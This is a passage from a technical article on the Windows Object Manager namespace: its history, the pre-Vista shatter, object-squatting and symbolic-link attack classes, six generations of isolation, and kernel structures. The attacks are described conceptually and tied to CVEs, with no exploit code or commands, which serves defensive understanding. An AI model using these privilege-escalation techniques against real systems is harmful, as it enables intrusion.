&lt;p&gt;Three years later, in 1996, Russinovich and Cogswell co-founded Winternals and released WinObj 1.0 [@en-wikipedia-mark-russinovich]. WinObj was the first publicly distributed tool to walk &lt;code&gt;\&lt;/code&gt; from user mode, using the native &lt;code&gt;NtOpenDirectoryObject&lt;/code&gt; and &lt;code&gt;NtQueryDirectoryObject&lt;/code&gt; syscalls that the Object Manager exposed through NTDLL [@ms-winobj]. The following year, Russinovich&apos;s October 1997 &lt;em&gt;Windows IT Pro&lt;/em&gt; column &quot;Inside the Object Manager&quot; gave the namespace its first treatment in the trade press. The original URL did not survive changes to TechTarget&apos;s web property portfolio in 2025 (TechTarget was acquired by Informa PLC in 2025), but the WinObj page still cites the column by name as &quot;Mark&apos;s October 1997 [WindowsITPro Magazine] column, &apos;Inside the Object Manager&apos;.&quot;The Russinovich 1997 column has no surviving direct URL because the URL did not survive changes to TechTarget&apos;s web property portfolio in 2025. The most accessible surviving citation is through the WinObj page itself. The same archive failure also explains why Helen Custer&apos;s 1993 biography returns HTTP 404 on Wikipedia in 2026; the book (ISBN 1-55615-481-X) survives in used-book channels only.&lt;/p&gt;
&lt;p&gt;The line of book-length internals references that began with Custer continued through &lt;em&gt;Inside Windows 2000&lt;/em&gt; (third edition) and the &lt;em&gt;Windows Internals&lt;/em&gt; series that succeeded it. The 7th edition Part 1 was published by Microsoft Press in May 2017, authored by Russinovich, Alex Ionescu, and David A. Solomon [@microsoftpressstore-wininternals7-part1]; its Chapter 8 is the current canonical reference for the Object Manager. James Forshaw&apos;s April 2024 &lt;em&gt;Windows Security Internals&lt;/em&gt; [@nostarch-windows-security-internals] is the contemporary companion that ties the namespace into the access-check pipeline.&lt;/p&gt;
&lt;p&gt;The 1993 design assumed a single global namespace. One process tree, one &lt;code&gt;\BaseNamedObjects&lt;/code&gt;, one &lt;code&gt;\Windows\WindowStations\WinSta0&lt;/code&gt;, one &lt;code&gt;\??&lt;/code&gt; view of DOS device letters. Everyone shared everything. Did that assumption survive the Internet?&lt;/p&gt;
&lt;h2&gt;3. The pre-Vista namespace and how it broke&lt;/h2&gt;
&lt;p&gt;It did not. By the late 1990s every interactive Windows user was sharing a name service with every running service. The single-global-namespace assumption produced three distinct exploit classes, each rediscovered repeatedly between 1996 and 2007, and each ultimately closed only by architectural change.&lt;/p&gt;
&lt;p&gt;The most public failure was the &lt;em&gt;shatter attack&lt;/em&gt;. In August 2002 a researcher named Chris Paget published a paper titled &quot;Exploiting design flaws in the Win32 API for privilege escalation.&quot; Wikipedia&apos;s article on the disclosure preserves the chronology: &quot;Shatter attacks became a topic of intense conversation in the security community in August 2002 after the publication of Chris Paget&apos;s paper&quot; [@en-wikipedia-shatter-attack]. The proof-of-concept was about thirty lines. As an unprivileged interactive user, Paget sent a &lt;code&gt;WM_TIMER&lt;/code&gt; window message to a service&apos;s hidden window in the same &lt;code&gt;\Windows\WindowStations\WinSta0&lt;/code&gt; (which all services and all interactive users shared in pre-Vista Windows), with a callback parameter pointing to attacker-placed shellcode. The shellcode ran as SYSTEM.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s initial response, preserved in the Wikipedia article, was that &quot;the flaw lies in the specific, highly privileged service&quot;: a per-service bug, patch the services. That stance did not survive the structural-class argument. The exploit was not a bug in one service. It was a &lt;em&gt;property of the namespace&lt;/em&gt;: as long as services and users shared a window station and a &lt;code&gt;\BaseNamedObjects&lt;/code&gt;, any service that ever called a Windows API processing a message from its message queue was reachable from any logged-in user.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A second class of pre-Vista failure was &lt;em&gt;named-object squatting&lt;/em&gt;. A low-privilege user pre-creates &lt;code&gt;\BaseNamedObjects\Some_Global_Event&lt;/code&gt; with a permissive DACL. A privileged service later calls &lt;code&gt;CreateEvent(&quot;Some_Global_Event&quot;)&lt;/code&gt; with default open-or-create semantics and ends up inheriting the squatter&apos;s object, security descriptor and all. This is not one service-author&apos;s bug; it is the consequence of every service-author trusting that names in a shared namespace would resolve to objects they themselves created. The pattern has been rediscovered approximately once a year for two decades. James Forshaw documents the contemporary named-pipe analog in his 2017 &quot;Named Pipe Secure Prefixes&quot; post [@tiraniddo-named-pipe-secure-prefixes], where the SMSS-created prefixes &lt;code&gt;\Device\NamedPipe\ProtectedPrefix\Administrators&lt;/code&gt;, &lt;code&gt;\Device\NamedPipe\ProtectedPrefix\LocalService&lt;/code&gt;, and &lt;code&gt;\Device\NamedPipe\ProtectedPrefix\NetworkService&lt;/code&gt; are TCB-privilege-gated -- only &lt;code&gt;smss.exe&lt;/code&gt; can create sibling protected prefixes, so a service that publishes its pipe below one of these prefixes inherits a DACL that low-privilege squatters cannot reach.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The third class was &lt;em&gt;symbolic-link redirection&lt;/em&gt;. The pre-Vista Object Manager exposed two kinds of user-creatable symbolic link: object-manager symbolic links inside &lt;code&gt;\??&lt;/code&gt; (the per-session DOS-devices view) and NTFS mount points on disk. The attack pattern was the same in both. A privileged process is asked to open a path the user controls part of. The user has pre-planted a symbolic link partway through the path that redirects the residual walk into a target the user could not otherwise write. The privileged process opens the redirected file and treats it as if it were the original.&lt;/p&gt;
&lt;p&gt;Forshaw&apos;s 2015 Project Zero post on the symbolic-link hardening generation is the canonical taxonomy: &quot;There are three types of symbolic links you can access from a low privileged user, Object Manager Symbolic Links, Registry Key Symbolic Links and NTFS Mount Points&quot; [@p0-symlink-mitigations]. His worked example for the Internet Explorer 11 EPM sandbox is CVE-2015-0055 [@nvd-cve-2015-0055], described in the post as &quot;an information disclosure issue in the IE EPM sandbox which abused symbolic links to bypass a security check.&quot;&lt;/p&gt;
&lt;p&gt;The aha moment from this section is the one Microsoft eventually conceded. The pre-Vista failure mode was not three independent bug families. It was &lt;em&gt;one&lt;/em&gt; structural problem -- a single global namespace shared by every principal -- with three faces. No amount of per-service patching could close it. The fix had to be architectural: the namespace itself had to be partitioned.The Interactive Services Detection Service (ISDS) was Vista&apos;s backward-compatibility hack for legacy services that drew GUIs into Session 0. ISDS displayed a &quot;An interactive service has requested attention&quot; prompt that let the user switch to Session 0 long enough to dismiss the dialog. It was deprecated in Windows 10 1803 and is the historical artifact of just how much pre-Vista code assumed services and users would share a window station.&lt;/p&gt;
&lt;p&gt;That fix took five years to ship. Windows Vista RTM was released on November 8, 2006 and General Availability arrived on January 30, 2007 [@en-wikipedia-windows-vista]. Vista did not ship one fix; it shipped three independent partition mechanisms in the same release window, because the structural failure had three faces and each face needed its own mechanism. The next section catalogues those mechanisms and the four additional generations of additive isolation that have built on them since.&lt;/p&gt;
&lt;h2&gt;4. Six generations of namespace isolation&lt;/h2&gt;
&lt;p&gt;The namespace itself has not been rearchitected since 1993. What has evolved, in six discrete generations between 1993 and 2026, is the set of &lt;em&gt;partition primitives&lt;/em&gt; layered on top: the mechanisms that let the kernel hide subtrees from particular callers, rewrite paths transparently for particular tokens, or invoke a registered watcher when a particular handle is created. Each generation closes a structural class. None has rendered its predecessor obsolete. On 2026 Windows 11 25H2 all six are simultaneously load-bearing.&lt;/p&gt;

flowchart LR
    G1[&quot;Gen 1&lt;br /&gt;NT 3.1, Jul 1993&lt;br /&gt;Single global namespace&quot;] --&amp;gt; G2
    G2[&quot;Gen 2&lt;br /&gt;Vista, Jan 2007 / SP1, Feb 2008&lt;br /&gt;Session 0 + MIC + ObRegisterCallbacks&quot;] --&amp;gt; G3
    G3[&quot;Gen 3&lt;br /&gt;Windows 8, Oct 2012&lt;br /&gt;AppContainer / Lowbox / per-package directory&quot;] --&amp;gt; G4
    G4[&quot;Gen 4&lt;br /&gt;Windows 10 RTM, Jul 2015&lt;br /&gt;VBS / IUM secure-kernel namespace&quot;] --&amp;gt; G5
    G5[&quot;Gen 5&lt;br /&gt;Windows Server 2016, Oct 2016&lt;br /&gt;Server Silos / silo-scoped views&quot;] --&amp;gt; G6
    G6[&quot;Gen 6&lt;br /&gt;MS15-090, Aug 2015 -&amp;gt;&lt;br /&gt;symbolic-link class hardening&quot;]
&lt;p&gt;Generation numbering is thematic (by isolation capability introduced) rather than strictly chronological. Gen 6 (MS15-090, August 11, 2015) predates Gen 5 (Windows Server 2016, October 12, 2016) by 14 months; the numbering reflects the logical layering of isolation mechanisms, not their calendar sequence.&lt;/p&gt;
&lt;h3&gt;4.1 Generation 2 -- Session 0 isolation, integrity levels, ObRegisterCallbacks&lt;/h3&gt;
&lt;p&gt;Vista shipped three mechanisms in one release window because the structural failure had three faces.&lt;/p&gt;
&lt;p&gt;The first was &lt;em&gt;Session 0 isolation&lt;/em&gt;. From Vista forward, services run in Session 0 alone; the first interactive logon starts at Session 1. Each session gets its own subtree at &lt;code&gt;\Sessions\&amp;lt;n&amp;gt;\BaseNamedObjects&lt;/code&gt;, &lt;code&gt;\Sessions\&amp;lt;n&amp;gt;\Windows\WindowStations&lt;/code&gt;, and &lt;code&gt;\Sessions\&amp;lt;n&amp;gt;\DosDevices&lt;/code&gt;. The Win32 &lt;code&gt;Local\&lt;/code&gt; prefix routes through &lt;code&gt;kernel32!BaseGetNamedObjectDirectory&lt;/code&gt; into the per-session BNO; &lt;code&gt;Global\&lt;/code&gt; routes into the shared &lt;code&gt;\BaseNamedObjects&lt;/code&gt; [@ms-termserv-kernel-object-namespaces]. The Wikipedia Shatter article preserves the architectural fix verbatim: &quot;Local user logins were moved from Session 0 to Session 1, thus separating the user&apos;s processes from system services that could be vulnerable&quot; [@en-wikipedia-shatter-attack]. After Vista an interactive user could no longer &lt;code&gt;SendMessage(WM_TIMER)&lt;/code&gt; into a service&apos;s hidden window because the user and the service no longer shared a window station.&lt;/p&gt;
&lt;p&gt;The second mechanism was &lt;em&gt;Mandatory Integrity Control&lt;/em&gt;. Vista introduced a new ACE type, &lt;code&gt;SYSTEM_MANDATORY_LABEL_ACE&lt;/code&gt;, attached to every object&apos;s security descriptor. Each token carries one of four integrity levels (Low S-1-16-4096, Medium S-1-16-8192, High S-1-16-12288, or System S-1-16-16384), and the Security Reference Monitor compares the requester&apos;s level against the object&apos;s level &lt;em&gt;after&lt;/em&gt; path resolution succeeds [@en-wikipedia-mandatory-integrity-control]. MIC is not a namespace partition. A Low-IL process and a Medium-IL process resolve the same &lt;code&gt;\BaseNamedObjects&lt;/code&gt; directory; only the open is denied at the leaf. The structural property MIC adds is that the leaf check is &lt;em&gt;unbypassable from user mode&lt;/em&gt;; the check fires regardless of which DACL the object carries.&lt;/p&gt;
&lt;p&gt;The third mechanism was &lt;code&gt;ObRegisterCallbacks&lt;/code&gt;. Microsoft&apos;s wdm.h documentation records the API&apos;s first ship date verbatim: &quot;Available starting with Windows Vista with Service Pack 1 (SP1) and Windows Server 2008&quot; [@ms-obregistercallbacks]. The API lets a KMCS-signed driver intercept handle creation and handle duplication on &lt;code&gt;PsProcessType&lt;/code&gt;, &lt;code&gt;PsThreadType&lt;/code&gt;, and the desktop object type. The registration carries an Altitude (a FltMgr-style collision key) and an array of &lt;code&gt;OB_OPERATION_REGISTRATION&lt;/code&gt; records [@ms-ob-callback-registration]. Pre-operation callbacks can strip access-mask bits before the handle is granted; post-operation callbacks fire for logging. The parallel API &lt;code&gt;PsSetCreateProcessNotifyRoutineEx&lt;/code&gt; [@ms-pssetcreateprocessnotifyroutineex] covers process creation. Together, these are the kernel-mode primitives every modern EDR product depends on; they ship inside the Object Manager itself and they are the reason an EDR knows when something opens a handle to &lt;code&gt;lsass.exe&lt;/code&gt;.&lt;/p&gt;
&lt;h3&gt;4.2 Generation 3 -- AppContainer and the lowbox token&lt;/h3&gt;
&lt;p&gt;Windows 8 shipped on October 26, 2012 [@en-wikipedia-windows-8]. Modern / UWP apps downloaded from the Microsoft Store needed a sandbox finer-grained than per-session BNO. The Vista path rewriting in &lt;code&gt;kernel32!BaseGetNamedObjectDirectory&lt;/code&gt; happened in user mode, which made it the wrong layer for a sandbox: a hostile renderer could in principle bypass the user-mode rewrite. The new layer moved into the kernel.&lt;/p&gt;
&lt;p&gt;Each UWP / MSIX process runs under a special token type, the &lt;em&gt;AppContainer / LowBox token&lt;/em&gt; (referred to in kernel code as the &lt;em&gt;lowbox token&lt;/em&gt;), created by &lt;code&gt;NtCreateLowBoxToken&lt;/code&gt;. The token carries a &lt;code&gt;TOKEN_APPCONTAINER_INFORMATION&lt;/code&gt; block that names the process&apos;s package SID (&lt;code&gt;S-1-15-2-...&lt;/code&gt;) and an &lt;code&gt;AppContainerNumber&lt;/code&gt;. Inside &lt;code&gt;ObpLookupObjectName&lt;/code&gt;, &lt;em&gt;before&lt;/em&gt; the path is walked, the kernel checks whether the caller&apos;s token is a lowbox token; if it is, lookups of &lt;code&gt;\BaseNamedObjects\X&lt;/code&gt;, &lt;code&gt;\RPC Control\X&lt;/code&gt;, and other rewriteable paths get redirected into &lt;code&gt;\Sessions\&amp;lt;n&amp;gt;\AppContainerNamedObjects\&amp;lt;package-sid&amp;gt;\X&lt;/code&gt;. The user-mode caller never sees the rewrite. The package-SID directory is created by SYSTEM at process-creation time with a security descriptor that grants the package SID, and only the package SID, full access. Microsoft&apos;s wording is precise: AppContainer works by &quot;sandboxing the application kernel objects, the AppContainer environment prevents the application from influencing, or being influenced by, other application processes&quot; [@ms-appcontainer-isolation].&lt;/p&gt;

The AppInfo service, which is responsible for creating the new application, calls the undocumented API CreateAppContainerToken to do some internal housekeeping. Unfortunately this API creates object directories under the user&apos;s AppContainerNamedObjects object directory to support redirecting BaseNamedObjects and RPC endpoints by the OS. -- James Forshaw, Project Zero Issue 1550 [@p0-issue1550]
&lt;p&gt;The residual class the AppContainer model has not closed is the one Forshaw&apos;s August 30, 2018 Project Zero post [@p0-issue1550] documents: because the SYSTEM-side AppInfo service has to write into the user&apos;s AppContainerNamedObjects subtree to set up redirection, an unprivileged caller can race the directory creation and end up planting a symbolic link the SYSTEM service then follows. The class -- &quot;SYSTEM-privileged directory creation in user-controllable territory&quot; -- is the worked example of why &quot;the kernel rewrites the name&quot; is an isolation property only when the SYSTEM helpers also use the rewrite.&lt;/p&gt;
&lt;h3&gt;4.3 Generation 4 -- VBS trustlets and the IUM secure-kernel namespace&lt;/h3&gt;
&lt;p&gt;Windows 10 RTM shipped on July 29, 2015 [@en-wikipedia-windows-10-version-history]. The Virtualization-Based Security (VBS) feature set introduced a parallel object-manager-shaped namespace that lives in Virtual Trust Level 1 (VTL1) and is inaccessible to the VTL0 NT kernel. Inside VTL1 the Secure Kernel (&lt;code&gt;securekernel.exe&lt;/code&gt;) maintains its own root, its own type registry, and its own handle-table machinery. The VTL0 NT kernel can see &lt;em&gt;trustlet processes&lt;/em&gt; -- the per-trustlet user-mode containers running in Isolated User Mode (IUM) -- but it cannot reach into their secure-side state.&lt;/p&gt;
&lt;p&gt;Alex Ionescu&apos;s Black Hat USA 2015 talk Battle of SKM and IUM [@ionescu-bh2015-pdf] is the canonical inventory of the inbox Trustlet IDs at ship: Trustlet 0 is the Secure Kernel Process hosting Device Guard; Trustlet 1 is LSAISO.EXE for Credential Guard; Trustlet 2 is VMSP.EXE hosting the virtual TPM; Trustlet 3 is the vTPM provisioning trustlet. Each is identified by a Trustlet ID and reachable only through narrow Secure Kernel ALPC ports. The VBS Trustlets piece in this series unpacks the threat model.&lt;/p&gt;
&lt;h3&gt;4.4 Generation 5 -- Server Silos and the silo-scoped namespace&lt;/h3&gt;
&lt;p&gt;Windows Server 2016 shipped on October 12, 2016 [@en-wikipedia-windows-server-2016]. Microsoft needed a Linux-namespaces equivalent so that container runtimes -- Docker, containerd, and the Azure Kubernetes Service Windows-node pods that followed -- could host adjacent workloads on one kernel. The answer was &lt;em&gt;Server Silo&lt;/em&gt;: a new &lt;code&gt;OBJECT_TYPE&lt;/code&gt; registered alongside &lt;code&gt;Job&lt;/code&gt;, &lt;code&gt;Process&lt;/code&gt;, and &lt;code&gt;Thread&lt;/code&gt;, that carries its own &lt;code&gt;RootDirectory&lt;/code&gt;, &lt;code&gt;DosDevicesDirectory&lt;/code&gt;, and &lt;code&gt;ServerSiloGlobals&lt;/code&gt;. A process attached to a silo via &lt;code&gt;PsAttachSiloToCurrentThread&lt;/code&gt; sees the silo&apos;s namespace as its root; the silo&apos;s &lt;code&gt;\GLOBAL??\C:&lt;/code&gt; resolves to the silo&apos;s &lt;code&gt;\Device\HarddiskVolume*&lt;/code&gt;, which is a different &lt;code&gt;Device&lt;/code&gt; object from the host&apos;s. Job objects [@ms-job-objects] provide the cgroups-equivalent resource-accounting dimension; the Silo type builds on top.&lt;/p&gt;
&lt;p&gt;The canonical reverse-engineering reference is Daniel Prizmant&apos;s July 2020 Unit 42 writeup, which spells out the architecture: &quot;job objects are used in a similar way control groups (cgroups) are used in Linux, and... server silo objects were used as a replacement for namespaces support in the kernel&quot; [@unit42-rev-eng-windows-containers].&lt;/p&gt;
&lt;p&gt;The companion piece, Prizmant&apos;s June 2021 &lt;em&gt;Siloscape&lt;/em&gt; [@unit42-siloscape], is the first known malware family that escapes the silo boundary: Prizmant named the malware &quot;Siloscape (sounds like silo escape) because its primary goal is to escape the container, and in Windows this is implemented mainly by a server silo.&quot; James Forshaw&apos;s April 2021 Project Zero post &lt;em&gt;Who Contains the Containers?&lt;/em&gt; [@p0-who-contains-containers] is the four-LPE companion disclosure. Microsoft&apos;s standing position is that Server Silo is not a security boundary; the Hyper-V Container, which adds a Hyper-V VM around the container&apos;s silo, is the security-boundary product.&lt;/p&gt;
&lt;h3&gt;4.5 Generation 6 -- the symbolic-link hardening continuum&lt;/h3&gt;
&lt;p&gt;The cross-cutting hardening generation closes the symlink subclass that recurred in Generations 1, 3, and 5. MS15-090 shipped on August 11, 2015 [@ms-ms15-090] and &quot;corrects how Windows Object Manager handles object symbolic links created by a sandbox process, by preventing improper interaction with the registry by sandboxed applications, and by preventing improper interaction with the filesystem by sandboxed applications.&quot; The bulletin&apos;s canonical Object Manager CVE is CVE-2015-2428 [@nvd-cve-2015-2428], described verbatim as the case where the &quot;Object Manager in Microsoft Windows... does not properly constrain impersonation levels during interaction with object symbolic links that originated in a sandboxed process.&quot; Subsequent Windows 10 builds added &lt;code&gt;OBJ_DONT_REPARSE&lt;/code&gt;, an open-time flag that disables symbolic-link substitution for callers willing to opt in, and post-Siloscape patches in 2021 closed &lt;code&gt;NtSetInformationSymbolicLink&lt;/code&gt; retargeting from inside a silo.&lt;/p&gt;
&lt;p&gt;The scope document for this article originally attributed MS15-090 to CVE-2015-2528 and CVE-2015-1463. Independent NVD verification confirmed neither is correct: CVE-2015-2528 [@nvd-cve-2015-2528] is the MS15-102 Task Management EoP, and CVE-2015-1463 [@nvd-cve-2015-1463] is a ClamAV denial-of-service crash. The canonical MS15-090 OM-symlink CVE is CVE-2015-2428. Separately, CVE-2018-0824 [@nvd-cve-2018-0824] is a CWE-502 COM deserialization issue that joined the CISA KEV catalog on 2024-08-05, not a namespace-squatting CVE.&lt;/p&gt;
&lt;p&gt;The residual subclass MS15-090 did not close was the per-session &lt;code&gt;\??&lt;/code&gt; DosDevices remapping path under impersonation. A low-privileged process whose token is impersonated by a SYSTEM service can plant a &lt;code&gt;DefineDosDevice&lt;/code&gt; remapping that survives into the impersonation-time &lt;code&gt;\??&lt;/code&gt; view, and the SYSTEM-side activation-context resolver then opens the redirected path while running with elevated privileges. The canonical 2023 worked example is HackSys&apos;s &lt;em&gt;Activation Context Hell -- DosDevices Remapping Attack under Impersonation&lt;/em&gt; [@hacksys-activation-context-hell], which targets the CSRSS / SxS activation-context resolver and shipped as CVE-2023-35359 [@nvd-cve-2023-35359], with the closely-related CVE-2022-22047 [@nvd-cve-2022-22047] covering the underlying CSRSS surface. The mitigation has to live inside the impersonation-aware &lt;code&gt;\??&lt;/code&gt; resolver in the SYSTEM caller, not at the symlink-creation gate.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Every generation since Generation 1 has &lt;em&gt;layered&lt;/em&gt; a new isolation primitive on top of the prior generation. None has rendered its predecessor obsolete. On 2026 Windows 11 25H2 all six generations coexist simultaneously: a UWP / MSIX app inside a Server Silo on a VBS-enabled host is session-partitioned, lowbox-rewritten, silo-scoped, VTL0-confined, integrity-gated, and watched by every loaded EDR&apos;s &lt;code&gt;ObRegisterCallbacks&lt;/code&gt; filter. Each layer adds an independent enforcement point at &lt;code&gt;ObpLookupObjectName&lt;/code&gt; time.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Six generations of isolation primitives is a tidy story, but it has glossed the most important question. What is the actual kernel data structure all six generations parameterize? What does the path-walk algorithm look like, what is the type registry, and where does the hash table live?&lt;/p&gt;
&lt;h2&gt;5. The four load-bearing primitives&lt;/h2&gt;
&lt;p&gt;If you remember one paragraph from this article, make it this one. The Object Manager namespace is built out of four kernel data structures: an &lt;code&gt;OBJECT_HEADER&lt;/code&gt; that prefixes every named object in memory, an &lt;code&gt;OBJECT_TYPE&lt;/code&gt; singleton that owns each type&apos;s method table, a &lt;code&gt;ParseProcedure&lt;/code&gt; that delegates path resolution to the owning subsystem when needed, and an &lt;code&gt;OBJECT_DIRECTORY&lt;/code&gt; hash table that maps names to objects. Every Windows security boundary you have read about is a parameter to one of these four pieces. The next eight subsections rebuild them one at a time.&lt;/p&gt;

flowchart TB
    OD[&quot;OBJECT_DIRECTORY&lt;br /&gt;(37-bucket hash table)&quot;] --&amp;gt;|&quot;hash(name) % 37&quot;| OH
    OH[&quot;OBJECT_HEADER&lt;br /&gt;(PointerCount, HandleCount,&lt;br /&gt;TypeIndex, InfoMask,&lt;br /&gt;SecurityDescriptor, Body offset)&quot;] --&amp;gt;|&quot;TypeIndex XOR&lt;br /&gt;ObHeaderCookie&quot;| OT
    OT[&quot;OBJECT_TYPE singleton&lt;br /&gt;(in nt!ObTypeIndexTable)&quot;] --&amp;gt;|&quot;TypeInfo&quot;| TI
    TI[&quot;TYPE_INFO method table&lt;br /&gt;(Dump, Open, Close, Delete,&lt;br /&gt;ParseProcedure,&lt;br /&gt;Security, QueryName, ...)&quot;]
    OH --&amp;gt;|&quot;Body[]&quot;| BODY[&quot;Type-specific body&lt;br /&gt;(EPROCESS, FILE_OBJECT,&lt;br /&gt;SECTION_OBJECT, ...)&quot;]
&lt;h3&gt;5.1 OBJECT_HEADER&lt;/h3&gt;
&lt;p&gt;Every named kernel object lives in non-paged pool. Immediately &lt;em&gt;before&lt;/em&gt; each object&apos;s typed body sits an &lt;code&gt;OBJECT_HEADER&lt;/code&gt;, a 0x30-byte (48-byte on x64) structure that the Object Manager owns. &lt;code&gt;PointerCount&lt;/code&gt; and &lt;code&gt;HandleCount&lt;/code&gt; are the two reference counts: the former tracks raw kernel-mode pointer references, the latter tracks user-mode handles. &lt;code&gt;TypeIndex&lt;/code&gt; is a single byte that indexes into the &lt;code&gt;nt!ObTypeIndexTable&lt;/code&gt; to find the object&apos;s type singleton; since Windows 10 1709, the byte is XOR-obfuscated against the per-boot &lt;code&gt;nt!ObHeaderCookie&lt;/code&gt; so that simple type confusion is non-trivial.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;InfoMask&lt;/code&gt; is a bitmap of optional sub-headers that may precede the main header: &lt;code&gt;OBJECT_HEADER_NAME_INFO&lt;/code&gt; for named objects, &lt;code&gt;OBJECT_HEADER_QUOTA_INFO&lt;/code&gt; for objects that charge a quota block, &lt;code&gt;OBJECT_HEADER_HANDLE_INFO&lt;/code&gt; for objects that need per-process handle accounting. &lt;code&gt;SecurityDescriptor&lt;/code&gt; is a tagged pointer to the object&apos;s DACL/SACL. &lt;code&gt;Body[]&lt;/code&gt; is the offset at which the type-specific payload begins; for a process object that payload is an &lt;code&gt;EPROCESS&lt;/code&gt;, for a file it is a &lt;code&gt;FILE_OBJECT&lt;/code&gt;, and so on. The canonical reference is Chapter 8 of &lt;em&gt;Windows Internals 7th Edition Part 1&lt;/em&gt; [@microsoftpressstore-wininternals7-part1].&lt;/p&gt;

The per-object header (`nt!_OBJECT_HEADER`) that precedes every named kernel object in non-paged pool. Carries reference counts (`PointerCount`, `HandleCount`), a `TypeIndex` byte that points into `nt!ObTypeIndexTable` (XOR-obfuscated against `nt!ObHeaderCookie` since Windows 10 1709), an `InfoMask` describing optional sub-headers, a `SecurityDescriptor` pointer, and the offset to the typed `Body[]`.
&lt;p&gt;The &lt;code&gt;TypeIndex&lt;/code&gt; XOR-with-cookie is one of the smallest kernel hardening changes Microsoft has shipped: a single byte that prevents a poisoned &lt;code&gt;OBJECT_HEADER&lt;/code&gt; from naming an arbitrary type after a heap-corruption primitive. The cookie is per-boot and lives in &lt;code&gt;nt!ObHeaderCookie&lt;/code&gt;. The hardening is documented in &lt;em&gt;Windows Internals 7th Edition&lt;/em&gt; Chapter 8 [@microsoftpressstore-wininternals7-part1] and in Geoff Chappell&apos;s reverse-engineering studies; Microsoft has not, as of 2026, published a Learn-hosted reference for the cookie itself.&lt;/p&gt;
&lt;h3&gt;5.2 OBJECT_TYPE&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;OBJECT_TYPE&lt;/code&gt; is the per-type singleton. There is exactly one &lt;code&gt;OBJECT_TYPE&lt;/code&gt; per registered kernel type, and they live in &lt;code&gt;\ObjectTypes&lt;/code&gt;. On Windows 11 25H2 the count sits at roughly seventy-five: &lt;code&gt;Type&lt;/code&gt;, &lt;code&gt;Directory&lt;/code&gt;, &lt;code&gt;SymbolicLink&lt;/code&gt;, &lt;code&gt;Token&lt;/code&gt;, &lt;code&gt;Job&lt;/code&gt;, &lt;code&gt;Process&lt;/code&gt;, &lt;code&gt;Thread&lt;/code&gt;, &lt;code&gt;Section&lt;/code&gt;, &lt;code&gt;Key&lt;/code&gt;, &lt;code&gt;File&lt;/code&gt;, &lt;code&gt;Event&lt;/code&gt;, &lt;code&gt;Mutant&lt;/code&gt;, &lt;code&gt;Semaphore&lt;/code&gt;, &lt;code&gt;Timer&lt;/code&gt;, &lt;code&gt;WindowStation&lt;/code&gt;, &lt;code&gt;Desktop&lt;/code&gt;, &lt;code&gt;Device&lt;/code&gt;, &lt;code&gt;Driver&lt;/code&gt;, &lt;code&gt;IoCompletion&lt;/code&gt;, &lt;code&gt;ALPC Port&lt;/code&gt;, &lt;code&gt;EtwRegistration&lt;/code&gt;, &lt;code&gt;Silo&lt;/code&gt;, and dozens more.&lt;/p&gt;

The per-type singleton (`nt!_OBJECT_TYPE`) that owns each kernel type&apos;s method table. The `TypeInfo` field carries eight procedure pointers and one offset field (WaitObjectFlagOffset): `DumpProcedure`, `OpenProcedure`, `CloseProcedure`, `DeleteProcedure`, `ParseProcedure` (the path-resolution callback), `SecurityProcedure`, `QueryNameProcedure`, `OkayToCloseProcedure`, and a `WaitObjectFlagOffset` offset for waitable types. Every `OBJECT_TYPE` instance is reachable through `\ObjectTypes`.
&lt;p&gt;The &lt;code&gt;TypeInfo&lt;/code&gt; field on each &lt;code&gt;OBJECT_TYPE&lt;/code&gt; carries eight procedure pointers and one offset field (WaitObjectFlagOffset). The most consequential is the &lt;code&gt;ParseProcedure&lt;/code&gt;. When &lt;code&gt;ObpLookupObjectName&lt;/code&gt; is walking a path component-by-component, and a step lands on an object whose &lt;code&gt;OBJECT_TYPE&lt;/code&gt; defines a &lt;code&gt;ParseProcedure&lt;/code&gt;, the OM hands the &lt;em&gt;residual&lt;/em&gt; path and the desired access to that procedure, which becomes the namespace authority below that point. That is how the registry&apos;s &lt;code&gt;Key&lt;/code&gt; type, the I/O Manager&apos;s &lt;code&gt;Device&lt;/code&gt; type, and the various WMI / Volume-Manager subsystems insert themselves into the namespace without the Object Manager having to know any of their internal structure [@en-wikipedia-object-manager].&lt;/p&gt;
&lt;h3&gt;5.3 The parse procedure&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;ObpLookupObjectName&lt;/code&gt; walks &lt;code&gt;\Foo\Bar\Baz\...\Leaf&lt;/code&gt; left-to-right. At each component the walker does one of three things. The common case is a hash-table lookup in the current &lt;code&gt;OBJECT_DIRECTORY&lt;/code&gt;&apos;s 37 buckets to find the child object by name. The second case is &lt;code&gt;SymbolicLink&lt;/code&gt; substitution: if the child object&apos;s type is &lt;code&gt;SymbolicLink&lt;/code&gt;, the walker substitutes the link target and re-enters the walk at the substitution. The third and most consequential case is &lt;em&gt;parse-procedure handoff&lt;/em&gt;. If the child object&apos;s &lt;code&gt;OBJECT_TYPE&lt;/code&gt; has a non-null &lt;code&gt;ParseProcedure&lt;/code&gt;, the walker stops, hands the residual path string to that procedure, and lets it decide what to do.&lt;/p&gt;

The load-bearing method pointer on each `OBJECT_TYPE`&apos;s `TypeInfo` field. When `ObpLookupObjectName` encounters an object whose type defines a `ParseProcedure`, the residual path is handed to that procedure for resolution. The two canonical parse procedures are `IopParseDevice` (for the `Device` type, which delegates further resolution to the device&apos;s owning driver via `IRP_MJ_CREATE`) and `CmpParseKey` (for the `Key` type, which walks the registry hive).
&lt;p&gt;&lt;code&gt;IopParseDevice&lt;/code&gt; is the parse procedure for the &lt;code&gt;Device&lt;/code&gt; type. When the walker reaches &lt;code&gt;\Device\HarddiskVolume1&lt;/code&gt; and is asked to continue with &lt;code&gt;\Users\me\file.txt&lt;/code&gt;, the I/O Manager builds an &lt;code&gt;IRP_MJ_CREATE&lt;/code&gt; packet, dispatches it to the filesystem driver that owns the volume (NTFS, ReFS, ExFAT, FAT32, or one of several others), and lets that driver walk the rest of the path inside its own on-disk structures. The driver returns a &lt;code&gt;FILE_OBJECT&lt;/code&gt;, which the Object Manager packages into a handle.&lt;/p&gt;
